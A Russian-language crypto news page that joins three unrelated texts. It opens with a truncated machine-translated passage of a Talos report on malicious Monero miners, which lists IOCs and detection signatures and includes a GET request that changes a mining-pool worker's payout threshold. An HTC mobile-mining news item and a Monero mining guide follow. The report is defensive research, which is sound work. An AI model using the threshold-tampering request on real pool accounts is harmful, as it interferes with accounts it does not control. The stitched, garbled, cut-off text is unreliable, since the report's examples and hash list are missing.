Одна вещь, которая была характерна для большинства обнаруженных нами злонамеренных майнеров, — это выбор имени файла. Злоумышленники выбрали имена файлов, которые выглядят безобидными, например «Windows 7.exe» и «Windows 10.exe». Вдобавок Талос обычно видел «taskmgrss.exe», «AdobeUpdater64.exe» и «svchost.exe». Talos также обнаружил примеры динамического извлечения майнеров и их запуска через командную строку, пример которых показан ниже.

Синтаксис командной строки


Интересно, что мы также обнаружили майнеры, претендующие на роль антивирусного программного обеспечения, включая наш собственный бесплатный антивирусный продукт Immunet.

Майнинг как полезная нагрузка будущего


Полезные нагрузки майнеров криптовалюты могут быть одними из самых простых способов заработать деньги для злоумышленников. Это, конечно, не для того, чтобы поощрять злоумышленников, но на самом деле такой подход очень эффективен для получения долгосрочного пассивного дохода для злоумышленников.Злоумышленникам просто нужно заразить как можно больше систем, запустить программное обеспечение для майнинга таким образом, чтобы его было трудно обнаружить, и они могут немедленно начать получать доход. Злоумышленники, вероятно, будут так же довольны вычислением 10 кГц / с, как и 500 кГц / с. Если у них есть конкретная цель хешрейта, они могут просто продолжать раздавать майнеры жертвам, пока они не достигнут этой цели.

Количество зараженных машин — вот то, как злоумышленники могут измерить успех этих кампаний. Поскольку финансовая выгода от майнинга является целью миссии, нет необходимости пытаться скомпрометировать хосты для кражи документов, паролей, кошельков, закрытых ключей, как мы привыкли видеть у финансово мотивированных злоумышленников.Мы часто видели программы-вымогатели, поставляемые с дополнительными полезными нагрузками. Они могут либо обеспечить вторичную финансовую выгоду, либо, в некоторых случаях, доставить настоящую вредоносную нагрузку. В последнем случае вымогатель может использовать дымовую завесу, призванную отвлечь внимание. Хотя мы видели, что активная эксплуатация уязвимостей используется в качестве исходного вектора для заражения систем с помощью программного обеспечения для майнинга криптовалюты, это степень откровенно злонамеренной активности. После заражения системы в этом сценарии злоумышленники обычно сосредотачиваются на максимальном увеличении хешрейта и не более.

Простое использование ресурсов одной зараженной системы, вероятно, не будет достаточно прибыльным для большинства злоумышленников. Однако, учитывая 100 000 систем, рентабельность такого подхода резко возрастает. В большинстве случаев злоумышленники пытаются максимально легко и дешево получить как можно больше доходов. С программным обеспечением для майнинга у них уже есть свой метод получения прибыли в виде контроля системных ресурсов и объема хэшей, которые оно может сгенерировать.

Регулярный доход — это не только то, к чему стремится законный бизнес.Злонамеренные противники тоже. Сложное вредоносное ПО стоит дорого в разработке, создании, тестировании и доставке жертвам. Сложное вредоносное ПО часто используется для очень сложных атак, и этот тип вредоносного ПО редко используется для атаки 100 000 пользователей. Таким образом, модель повторяющихся доходов, вообще говоря, не применима к этим сложным атакам вредоносного ПО. С помощью криптомайнеров злоумышленники создали целое решение, специально разработанное для одной цели: получения регулярного дохода.

Продолжение использования криптомайнеров в качестве полезной нагрузки и обеспечение работы системы на полную мощность будет и дальше развиваться.Talos наблюдал атаки, при которых злоумышленник очищал машину, удаляя других майнеров, а затем заразил пользователя и установил собственное программное обеспечение для майнинга. Злоумышленники уже борются за эти ресурсы, поскольку потенциальная денежная ценность и постоянный поток доходов огромны.

Являются ли майнеры вредоносным ПО?


Само по себе клиентское программное обеспечение для майнинга не следует рассматривать как вредоносное ПО или потенциально нежелательное приложение / потенциально нежелательную программу (PUA / PUP). Законное клиентское программное обеспечение для майнинга просто злонамеренно используется участниками, чтобы гарантировать, что они могут получать доход за счет майнинга на зараженных машинах.Программное обеспечение для майнинга написано специально для обеспечения доступности используемых криптовалют для людей, обеспечения консенсуса в сети, выполнения и проверки транзакций и вознаграждения майнеров, выполняющих сложные математические вычисления для обеспечения целостности и безопасности экосистемы и сети криптовалюты.

Если законный пользователь запускает программное обеспечение для майнинга локально, он может запустить свою собственную платформу для майнинга; аналогично законный пользователь может стать частью пула, чтобы попытаться максимизировать свои шансы на получение выплаты.Разница между законным пользователем и злоумышленником состоит в том, что они выполняют эту задачу намеренно. Злоумышленник выполняет эту задачу точно так же, как и законный пользователь, но без ведома или согласия пользователя. Разница заключается в обмане конечного пользователя и намерении майнинга криптовалюты. Само программное обеспечение, к сожалению, является частью вредоносного арсенала, который выбирает использовать злоумышленник, но, как и в случае использования Powershell или PSExec для злонамеренных атак, само программное обеспечение не является вредоносным по своей природе.Важно то, с какой целью он используется. Когда злоумышленники используют этих майнеров, жертвы невольно вынуждены платить за электроэнергию, использованную в процессе майнинга, и злоупотребляют своими вычислительными ресурсами для получения доходов для участников.

Воздействие на предприятие


Независимо от того, был ли майнер развернут с использованием вредоносных методов или просто корпоративным пользователем, пытающимся сгенерировать некоторую монету со своего рабочего компьютера, предприятия должны решить, являются ли майнеры вредоносными в их средах.

Это интересная задача, потому что обычно майнеры используют только циклы CPU / GPU для решения сложных математических задач. Однако для организации это растрата или кража ресурсов, и, в зависимости от конфигурации этих систем, это может иметь более серьезные последствия. Очевидно, что если майнер помещается в систему одним из описанных выше методов, это вредоносная полезная нагрузка. Однако Talos обнаружил, что большое количество пользователей охотно запускают эти майнеры в корпоративных системах для генерации монет.

Из-за большого количества желающих пользователей это может потребовать от организации разработки политики или добавления раздела к существующей политике, касающегося использования майнеров в корпоративных системах и того, как это будет обрабатываться. Кроме того, каждая организация должна решить, следует ли рассматривать этот файл как вредоносное ПО и удалять / помещать в карантин как таковой.

Ошибки, которые мы нашли


Изучая вредоносные кампании, распространяющие программное обеспечение для майнинга Monero, мы наблюдали интересный случай, когда злоумышленник использовал клиент для майнинга с открытым исходным кодом под названием «NiceHash Miner» и начал его распространение.В данном конкретном случае синтаксис командной строки, используемый для запуска майнера в зараженных системах, следующий:

Синтаксис командной строки


Интересно, что параметр userpass, который используется для регистрации клиента майнинга для конкретного используемого идентификатора Worker ID, — это «3DJhaQaKA6oyRaGyDZYdkZcise4b9DrCi2.Nsikak01». При анализе этой конкретной кампании мы определили, что этот userpass фактически является userpass по умолчанию, указанным в исходном коде программного обеспечения для майнинга, выпущенном на GitHub.Злоумышленник не удосужился его изменить, в результате все машины были заражены майнингом Monero, который отправлялся автору майнингового приложения, а не самому злоумышленнику.

Значения исходного кода по умолчанию


В нескольких других случаях мы наблюдали, как злоумышленники использовали значения по умолчанию в синтаксисе командной строки для запуска своих майнеров. Ниже приведены несколько примеров:

Пример сбоя майнинга # 1

Пример сбоя майнинга № 2

Пример сбоя майнинга № 3

Пример сбоя майнинга # 4


Это ясно указывает на то, что многие злоумышленники, использующие майнеры криптовалюты, широко используют код и синтаксис командной строки, которые они находят в Интернете, и в некоторых случаях могут фактически не понимать код, с которым они работают, или даже как работает майнинг криптовалюты.В результате значения по умолчанию и заполнители не всегда обновляются, чтобы позволить им монетизировать или получать доход от подобных атак.

Кроме того, в ходе нашего исследования мы обнаружили интересный способ, который теоретически может позволить манипулировать выплатами, полученными злоумышленниками. В настоящее время в веб-интерфейсе, используемом многими пулами майнинга (и предоставляемом через API), есть значение «Personal Threshold», которое можно редактировать публично. Этот параметр определяет, сколько монет необходимо добыть, прежде чем выплата будет отправлена ​​на кошелек злоумышленника.Установив это значение на большую сумму (например, 50 XMR), злоумышленнику придется ждать продолжительный период перед получением следующей выплаты. Хотя злоумышленник может просто изменить это значение обратно, его можно сразу изменить обратно на 50 XMR с помощью запроса GET, если запрос выполняется на URL-адрес пула майнинга с использованием следующей структуры:

 "https: // p5 [. ] minexmr [.] com / set_info? address = $ WORKER & type = thold & amount = 50000000000000 "

Где $ WORKER — это изменяемый идентификатор рабочего.Этот же параметр доступен на многих проанализированных нами веб-сайтах крупных майнинговых пулов. Обратите внимание, что синтаксис может отличаться в зависимости от пула, используемого противником.

Вывод


Количество способов, которыми злоумышленники доставляют майнеры конечным пользователям, ошеломляет. Это напоминает взрыв программ-вымогателей, который мы наблюдали несколько лет назад. Это свидетельствует о значительном изменении типов полезной нагрузки, которую пытается доставить противник. Это помогает показать, что эффективность программ-вымогателей как полезной нагрузки ограничена.Он всегда будет эффективным для выкупа определенных организаций или использования в целевых атаках, но в качестве полезной нагрузки для компрометации случайных жертв его охват определенно имеет ограничения. В какой-то момент пул потенциальных жертв становится слишком маленьким, чтобы приносить ожидаемый доход.

Крипто-майнеры вполне могут стать новой полезной нагрузкой для злоумышленников. Это было и всегда будет связано с деньгами, а майнинг криптовалют — это эффективный способ получения дохода. Это не принесет больших сумм денег для каждой отдельной системы, но когда вы объединяете сотни или тысячи систем, это может быть чрезвычайно прибыльным.Это также более скрытая угроза, чем программа-вымогатель. У пользователя гораздо меньше шансов узнать, что в системе установлен злонамеренный майнер, если не считать периодического замедления. Это увеличивает время заражения системы и получение дохода. Во многих отношениях это полная противоположность программ-вымогателей. Программа-вымогатель предназначена для получения дохода от жертвы в течение нескольких дней, и расплата за нее наступает немедленно. Вредоносные майнеры предназначены для существования в системе в течение недель, месяцев или, в идеале, лет.

Это также ставит перед предприятиями новые задачи.Необходимо принять решение о том, как обращаться с такими вещами, как майнеры, и следует ли рассматривать их исключительно как вредоносное ПО. Каждому предприятию необходимо решить, как бороться с этими угрозами. Первый шаг — определить, насколько они распространены в вашей среде, а затем решить, как с этим справиться в будущем.

Покрытие


Существуют различные способы обращения к майнерам, и в продукты безопасности Cisco встроена функция обнаружения, позволяющая обнаружить эту активность. В AMP есть специальное имя обнаружения для майнеров монет, W32.BitCoinMiner. Однако, поскольку эти майнеры могут быть добавлены в качестве модулей к различным другим угрозам, имена обнаружения могут отличаться. Кроме того, есть пара сигнатур NGIPS, предназначенных также для обнаружения активности майнинга. Однако эти правила могут быть не включены по умолчанию в вашей среде в зависимости от важности потенциально нежелательных приложений (PUA) в вашей сети. Сигнатуры, обнаруживающие этот тип активности, включают, но не ограничиваются: 40841-40842, 45417 и 45548-45550.

Кроме того, в таких технологиях, как Threat Grid, созданы индикаторы, позволяющие четко определять наличие активности майнинга при отправке образца.

Раздел IOC


IP-адреса:


89.248.169 [.] 136
128.199.86 [.] 57

Домены:


qyvtls749tio [.] com
youronionlink [.] лук

Файловые хэши


HTC представляет майнинг Monero на мобильных телефонах для децентрализации хешрейта

(фотоиллюстрация Элвина Чана / SOPA Images / LightRocket через Getty Images)

LightRocket через Getty Images

HTC, производитель мобильных телефонов, который проявил особый интерес к применению технологии блокчейн для мобильных телефонов, теперь решил перейти в сферу майнинга.HTC Exodus, его флагманский телефон с блокчейном, заключил партнерское соглашение с Mida Labs, чтобы впервые вывести майнинг криптовалюты на арену мобильных телефонов.

Приложение DeMiner, разработанное Midas Labs, будет доступно для загрузки во втором квартале 2020 года.

Непосредственное беспокойство вызывает то, что идея майнинга криптовалюты выдвигает на первый план высокую вычислительную мощность и потребление энергии. Но HTC и Midas Labs утверждают, что они сделали его эффективным на мобильных устройствах, используя ориентированную на конфиденциальность криптовалюту Monero (XMR).

Сообщается, что приложение DeMiner сравнимо с обычными настольными компьютерами по скорости хеширования, но его потребление энергии для такой вычислительной мощности намного меньше. Это впервые позволяет мобильным устройствам быть пригодными для майнинга криптовалюты (во включенном состоянии).

Midas Labs позволяет пользователям EXODUS 1S добывать в среднем не менее 0,0038 долларов США XMR в день, в то время как стоимость электроэнергии составляет менее 50% от этой суммы. Частично это делается для того, чтобы углубить процесс децентрализации за счет предоставления аппаратных решений для мобильной индустрии.

Перевод майнинга на мобильный

Традиционная идея майнинга криптовалюты вызывает образы либо мощных графических процессоров, как минимум, либо в день микросхем ASIC, массивного специализированного оборудования для решения этих уравнений. Майнинг на мобильном телефоне, похоже, идет против течения. Однако, как говорит Фил Чен, главный децентрализованный директор HTC,

«Биткойн и мобильные телефоны — самые важные и важные технологические изобретения последнего времени.Мне посчастливилось быть на переднем крае обеих этих технологий. В основе наших решений, связанных с этими технологиями, лежат наши ценности; в частности, вопрос о том, как мы можем далее децентрализовать и создать более инклюзивную денежную систему.

«Майнинг на мобильных устройствах — важная тема исследования для понимания разработки безопасных криптосетей. Количество мобильных телефонов в 2020 году приближается к 3,5 миллиардам, что приведет к дальнейшей децентрализации и распределению хэш-скорости и мощности майнинга таких криптосетей.

«Monero — важный и решающий эксперимент, противостоящий тенденции централизованного майнинга. Он использует алгоритм под названием «Случайный X», который подходит для вычислений на базе ЦП. Использование этого алгоритма ведет к активной борьбе с некоторыми централизующими силами, которые создают пулы для майнинга в биткойнах ».

«Более того, продуманная разработка энергосберегающего программного обеспечения для мобильных устройств, в отличие от энергоемких ноутбуков или настольных компьютеров, повышает эффективность и рентабельность майнинга на мобильных устройствах.«

«Наша позиция в HTC — использовать мобильный телефон для дальнейшей децентрализации. Мобильный телефон стал основным вычислительным устройством людей, и его доступность для всех дает людям новые возможности ».

«Другими словами, вопрос не в том, должны ли мы использовать ASIC или CPU. Вопрос в том, как мы можем еще больше децентрализовать и обеспечить более инклюзивную денежную систему? »

Доктор Джри Ли, основатель и генеральный директор Midas Labs и профессор Тайваньского национального университета, разделяет мысли Черна о более высокой степени децентрализации.

«Майнинг криптовалюты никогда не должен ограничиваться централизованными фермами или гигантскими майнерами. Майнинг на мобильных или других личных устройствах идеально соответствует главному духу блокчейна — децентрализации. Сегодня самые ценные криптовалюты по-прежнему основаны на доказательстве работы. То есть майнинг — неотъемлемая часть этих криптовалют », — сказал он мне.

«Мобильный майнинг значительно усилит децентрализацию, поскольку повысит безопасность сети. Если мы помогаем защитить сети, то от этого выиграют все пользователи криптовалюты.Также следует иметь в виду, что в мире существуют миллиарды смартфонов. Используя в качестве примера Monero, скорость хеширования мобильных устройств может легко превысить существующую скорость хеширования, если только 1% смартфонов будет выполнять майнинг. Перенос майнинга на мобильные устройства — очень важный шаг для блокчейна ».

Обеспокоенность по поводу Monero

Monero — это криптовалюта, выбранная HTC, чтобы начать свой путь к дальнейшей децентрализации криптовалют за счет распространения мобильных устройств, однако это монета, вызывающая немало споров.

Монета, ориентированная на конфиденциальность, используется не только в рамках закона. Дополнительная анонимность на Monero указывает на то, что регуляторы трения монет ошибаются, и видела, как компании негативно реагируют на это.

BitBay, базирующаяся в Эстонии, объявила в понедельник, что Monero (XML) больше не будет продаваться в феврале из-за обеспокоенности регулирующих органов по поводу его потенциального использования для отмывания денег. Это произошло из-за того, что OKEx тоже сбросил монету. Coinbase в Великобритании также сбросила Zcash, монету с аналогичным уклоном.

По мнению Черна, проблемы, связанные с аспектами конфиденциальности Monero, не должны влиять на его техническую возможность майнинга для мобильных устройств.

«Любые проблемы с конфиденциальностью Monero не влияют на его техническую возможность майнинга на этом первом важном шаге и прорыве.

«Конфиденциальность и взаимозаменяемость Monero в основном не имеют отношения к AML и KYC банков. Другими словами, банки по-прежнему могут правильно выполнять AML и KYC с помощью конфиденциальной монеты, такой как Monero.Например, спросить клиента, откуда взялся ваш Monero, — это проблема вне сети. Кроме того, я бы сказал, что аспект взаимозаменяемости Monero делает его еще более антихрупким как средство обмена, в отличие от части собственности с явным происхождением », — добавил он.

«Если немного уменьшить масштаб, это в основном касается финансовых учреждений, а не только банков. Все финансовые учреждения обязаны соблюдать правила AML, KYC и другие правила «.

«Необходимо сделать различие в том, что мы должны регулировать людей и компании.Мы не должны вводить себя в заблуждение, думая, что деньги должны стать титульной собственностью. Этот эксперимент уже проводился сотни лет назад ».

Как и на чем майнить Monero в 2021 году?

Monero (XMR) — это монета с открытым исходным кодом, созданная в апреле 2014 года. Она ориентирована на конфиденциальность, децентрализацию и масштабируемость. Новые XMR добываются путем майнинга и будут продолжать расти до тех пор, пока в обращении не будет 18,4 миллиона монет.

Прибыльна ли добыча Monero?

Как и с любой другой криптовалютой, однозначного ответа нет.Прибыльность зависит от затрат на электроэнергию, стоимости оборудования и текущей скорости хеширования.

При входе на бычий рынок цена XMR растет, и добывать его выгодно.

Награда за майнинг

Награда за вычисленный блок Monero, отличный от вознаграждения в биткойнах. В отличие от установленной платы за блок BTC, которая уменьшается вдвое каждые четыре года, вознаграждение за создание новых XMR постепенно уменьшается.

Текущее вознаграждение за блок составляет около 1,65 XMR, а новый блок добывается примерно каждые 2 минуты.Здесь вы можете отслеживать среднюю дневную заработную плату.

У

Monero есть еще одна интересная особенность, которая отличает его от BTC. Сообщество майнеров биткойнов обеспокоено тем, что, поскольку вознаграждение за блок постоянно сокращается вдвое, соло-майнеры покидают шахту. В этом случае безопасность окажется под угрозой, потому что организованному пулу станет легче получить желанный 51% сети.

У анонимной криптовалюты

есть решение этой проблемы. По данным MoneroOutreach.org: «Ставка вознаграждения будет неуклонно снижаться до конца мая 2022 года, когда в обращении будет 18,132 миллиона XMR, после чего вознаграждение за блок в размере 0,6 XMR останется на неопределенный срок».

Таким образом, Monero примет на себя небольшую инфляцию, чтобы всегда был запас прочности.

Хешрейт Monero

Лучшее место для проверки хешрейта Monero — BitInfoCharts.

Если вы посмотрите на долгосрочные графики хешрейта Monero, вы увидите, что он почти мгновенно падает на 50% и более.Это результат частых хард-форков.

Команда разработчиков Monero регулярно вносит изменения в код криптовалюты для предотвращения работы ASIC в сети (ASIC — это мощные устройства для майнинга, которые используются централизованными пулами)

Команда разработчиков изменяет алгоритм хеширования, наряду с другими изменениями, чтобы сделать майнинг монет доступным для частных лиц.

К сожалению, одним из важных факторов, влияющих на хешрейт Monero, является угон ботнета.То есть вирусы заражают компьютеры и заставляют их добывать криптовалюту без ведома владельца.

Это проблема, уникальная для Monero, поскольку монета в основном добывается на рабочих компьютерах, а не на ASIC.

Сложность добычи

Для тех, кто занимается майнингом XMR на своем компьютере с небольшим набором процессоров, безусловно, лучшее время для майнинга — сразу после одного из хард-форков сети.

Учитывая, что дата вилки известна заранее, можно заранее спланировать начало производства.

Количество ботнетов, работающих в настоящее время на Monero, также влияет на прибыльность. Чем больше зараженных компьютеров вовлечено в процесс майнинга, тем сложнее найти новый блок.

Сравнение оборудования для майнинга Monero: 3 лучших варианта

Есть много процессоров, которые можно использовать для майнинга. Мы сравним три из них, начиная с самого мощного AMD EPYC 7742.

1. EPYC 7742. Этот поистине эпический 64-ядерный процессор способен выдавать невероятные 44 000 H / s.Во время работы он потребляет около 225 Вт энергии.

Хотя EPYC 7742 — самый производительный процессор на рынке, его мощность имеет свою цену. В настоящее время он продается на Amazon за 7000 долларов. Оборудование последнего поколения часто продается со значительной наценкой. Поэтому начинающему майнеру имеет смысл приобрести что-то попроще.

2. AMD Ryzen Threadripper 3970X … Имеет 32 ядра и стоит 1900 долларов на Amazon. Он может майнить со скоростью 28000 H / s при потребляемой мощности 200 Вт.

Хотя вы можете получить высокую скорость хеширования без затрат, объединив два Threadrippers против одного EPYC 7742, недостатком является то, что потребляемая мощность составляет 400 Вт вместо 225.

3. AMD Ryzen 5 3600. Это самый дешевый процессор для майнинга XMR в нашем списке. Он развивает 7900 H / s, потребляет 65 Вт и стоит всего 175 долларов.

Для тех, кто только начинает практиковаться в майнинге, Ryzen 5 станет отличным выбором, так как позволит настроить ферму и найти комфортную рабочую среду.Вы можете обновить свое оборудование позже, как только принципы майнинга станут понятны.

Калькулятор майнинга Monero

Есть несколько способов оценить, сколько вы можете заработать в этой области. Один из ресурсов — MoneroHash.

MoneroHash — один из старейших майнинговых пулов. У них есть подробная статистика по доходности, частоте блоков и т. Д.

Вы также можете использовать специальный калькулятор майнинга на WhatToMine.com.

Чтобы точно определить возможность получения дохода, нужно рассчитать свои затраты на оборудование, электроэнергию, комиссию пула (например, MoneroHash сборы 1.6%), а также введите среднюю цену монеты.

Вам также необходимо знать хешрейт оборудования, и, установив эти данные, вы можете принять решение о возможности майнинга на этом блокчейне.

Хранение Monero

Один из вариантов — использовать официальный кошелек, но его загрузка может занять много времени.

Альтернатива — хранить добытые монеты и награды в Exodus. Это мультивалютное хранилище, которое позволяет использовать XMR сразу после внесения депозита.

Вот лишь некоторые из самых популярных функций Exodus:

• поддержка более 100 криптоактивов;

• премиальный дизайн и удобство использования;

• возможность обменивать одни активы на другие через кошелек без создания учетной записи;

• поддержка лучших децентрализованных приложений, таких как Compound Finance;

• возможность получения пассивного крипто-дохода;

• функция синхронизации кошелька с ПК и мобильным телефоном;

• оперативная техподдержка 24/7.

Обратите внимание, что награды за майнинг в Exodus лучше всего отправлять большими порциями и / или реже. Это предотвратит проблемы при одновременной отправке большого количества небольших сумм.

Подпишитесь на ForkNews в Telegram, чтобы быть в курсе последних новостей из мира криптовалют

Уведомление Facebook для ЕС! Вам необходимо войти в систему, чтобы просматривать и оставлять комментарии в FB!

.
Обновлено: 03.12.2021 — 21:01

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *